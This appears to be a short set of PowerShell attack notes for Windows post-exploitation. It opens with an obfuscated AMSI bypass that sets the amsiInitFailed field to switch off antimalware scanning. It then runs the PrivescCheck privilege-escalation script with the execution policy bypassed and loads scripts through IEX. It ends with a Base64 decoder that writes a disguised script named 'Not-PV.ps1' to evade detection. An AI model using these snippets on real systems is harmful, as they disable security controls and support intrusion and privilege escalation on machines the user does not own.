S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )


powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

. .\PrivescCheck.ps1
Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1
Get-Content .\PrivescCheck.ps1 | Out-String | IEX

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("blahblah"))


# Specify the path to the source file
$sourceFilePath = "C:\Path\To\Your\File.txt"

# Specify the path for the new file
$destinationFilePath = "C:\Path\To\Your\Not-PV.ps1"

# Get the contents of the file
$fileContent = Get-Content -Path $sourceFilePath -Raw

# Decode the Base64 content
$decodedContent = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($fileContent))

# Save the decoded content to a new file
$decodedContent | Set-Content -Path $destinationFilePath -Encoding UTF8

Write-Host "Decoded content saved to $destinationFilePath"
